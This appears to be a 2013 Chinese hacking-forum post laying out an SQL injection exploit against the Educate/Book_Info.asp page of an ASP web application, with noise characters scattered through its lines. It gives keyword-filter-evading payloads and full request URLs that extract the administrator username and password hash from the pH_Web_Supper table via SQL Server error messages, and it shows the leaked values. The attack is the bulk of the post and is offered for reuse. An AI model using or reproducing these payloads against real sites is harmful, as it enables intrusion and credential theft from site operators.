漏洞出现在Educate/Book_Info.asp
2 \' B- Y% m& p! W# l * \( P9 b" X: N9 ?0 N* `
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
$ U9 E( n+ D3 L' x" ~
$ K1 g4 \" L5 f0 i) gexp:如下
& z7 ~$ m+ a6 m& v9 Q& b查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
2 v9 i" r/ e' K- N8 \3 o查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ l" e- u3 J, t% J
: F- v. t& {8 L8 Z/ k* Lhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)5 E( U3 {7 M o
/ n" J: ]# \: K! x5 r EMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
! t! x5 F- ^) Y# @4 U
& u8 V' P) n7 J7 D. T& A将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
0 m* L! f0 b$ \
, e% V) _+ l- u3 w) H3 `/Educate/Book_Info.asp,行 8* y% J0 H4 ^- G8 E% r# G
9 s7 h+ N* R* t* S, \* Jhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
$ j! P7 }+ p/ Q/ y! h3 V E% X , O8 B3 {# f7 y `' s
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
, A. I, [" |0 s# v% c* u" w e% ?' [2 H8 {. T$ V) |
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。( I9 Y& Z! J( n8 s) A F
) J; q* B& p2 L. _4 l; `* E& z
/Educate/Book_Info.asp,行 8
$ {# n$ `) }! m8 }# H |
发表于 2013-2-16 21:44:16
收藏
支持
反对